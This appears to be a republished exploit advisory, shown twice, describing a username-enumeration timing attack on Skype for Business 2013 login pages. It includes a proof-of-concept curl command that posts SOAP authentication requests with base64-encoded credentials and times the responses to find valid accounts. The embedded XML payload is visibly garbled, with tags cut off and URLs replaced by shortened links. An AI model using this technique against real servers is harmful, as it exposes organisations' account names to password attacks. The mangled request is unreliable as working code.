# Exploit Title: Skype for Business 2013 user enumeration timing attack# Date: 2016-06-08# Exploit Author: nyxgeek# Vendor Homepage: http://ift.tt/PAIY54# Version: Skype for Business 2013### Skype for Business 2013 is vulnerable to a timing attack that allows for username enumeration## When Skype/Lync is exposed externally, a login page will be located at http://ift.tt/14VJaUz.## In the attack, a short response time indicates a valid username, whereas a long response time# indicates an invalid username. This was tested in a large AD environment with many OUs and# thousands of accounts.## It is possible that the difference in response times may be smaller in smaller AD environments## For example:# Valid username response time - 0.49s# Invalid username response time - 3.54s### Usernames and passwords are both base64-encoded without a newline, and submitted in the form# of DOMAIN\username.## When generating the base64 on linux use the -n parameter with echo to exclude the newline char# echo -n "DOMAIN\username" | base64## This was reported to Microsoft on 2016-06-07 but it 'does not meet the bar for security servicing'## Below is a proof of concept curl command, which can be thrown into a bash script for ease of use.#!/bin/bashcurl -o /dev/null -w "\n\nTOTAL TIME IS %{time_total}\n\n" -i -s -k -X 'POST' -H 'User-Agent: Just looking around' -H 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' -H 'Keep-Alive: 300' -H 'Content-Type: text/xml' -H 'SOAPAction: http://ift.tt/1wZAU6R' -H 'Referer: http://ift.tt/1YvEL88' --data-binary $'y s:mustUnderstand=\"1\" xmlns:u=\"http://ift.tt/266RyAerity-utility-1.0.xsd\" xmlns=\"http://ift.tt/1YvFearty-secext-1.0.xsd\">RE9NQUlOXHVzZXJuYW1lame>token-profile-1.0#PasswordText\">c2VjcmV0cGFzc3dvcmQ=meToken>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1<RequestType>http://ift.tt/266SaWope>e xmlns=\"http://ift.tt/HKXHai\">https://dialin.dhttp://ift.tt/1YvEB0Cce>ty-utility-1.0.xsd\">2016-06-07T02:23:36Zty-utility-1.0.xsd\">2016-06-07T02:38:36Zhttp://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKeyRequestSecurityToken>' 'http://ift.tt/1YvGpXa'[ reply ]from SecurityFocus Vulnerabilities http://ift.tt/1YvFw0Z
# Exploit Title: Skype for Business 2013 user enumeration timing attack
# Date: 2016-06-08
# Exploit Author: nyxgeek
# Vendor Homepage: http://ift.tt/PAIY54
# Version: Skype for Business 2013
#
#
# Skype for Business 2013 is vulnerable to a timing attack that allows for username enumeration
#
# When Skype/Lync is exposed externally, a login page will be located at http://ift.tt/14VJaUz.
#
# In the attack, a short response time indicates a valid username, whereas a long response time
# indicates an invalid username. This was tested in a large AD environment with many OUs and
# thousands of accounts.
#
# It is possible that the difference in response times may be smaller in smaller AD environments
#
# For example:
# Valid username response time - 0.49s
# Invalid username response time - 3.54s
#
#
# Usernames and passwords are both base64-encoded without a newline, and submitted in the form
# of DOMAIN\username.
#
# When generating the base64 on linux use the -n parameter with echo to exclude the newline char
# echo -n "DOMAIN\username" | base64
#
# This was reported to Microsoft on 2016-06-07 but it 'does not meet the bar for security servicing'
#
# Below is a proof of concept curl command, which can be thrown into a bash script for ease of use.
#!/bin/bash
curl -o /dev/null -w "\n\nTOTAL TIME IS %{time_total}\n\n" -i -s -k -X 'POST' -H 'User-Agent: Just looking around' -H 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' -H 'Keep-Alive: 300' -H 'Content-Type: text/xml' -H 'SOAPAction: http://ift.tt/1wZAU6R' -H 'Referer: http://ift.tt/1YvEL88' --data-binary $'ur
y s:mustUnderstand=\"1\" xmlns:u=\"http://ift.tt/266RyAe
rity-utility-1.0.xsd\" xmlns=\"http://ift.tt/1YvFear
ty-secext-1.0.xsd\">RE9NQUlOXHVzZXJuYW1l
ame>
token-profile-1.0#PasswordText\">c2VjcmV0cGFzc3dvcmQ=
meToken>
n:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1<
RequestType>http://ift.tt/266SaWo
pe>
e xmlns=\"http://ift.tt/HKXHai\">
https://dialin.dhttp://ift.tt/1YvEB0C
ce>h
ty-utility-1.0.xsd\">2016-06-07T02:23:36Z
ty-utility-1.0.xsd\">2016-06-07T02:38:36Z
ttp://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
RequestSecurityToken>' 'http://ift.tt/1YvGpXa'
[ reply ]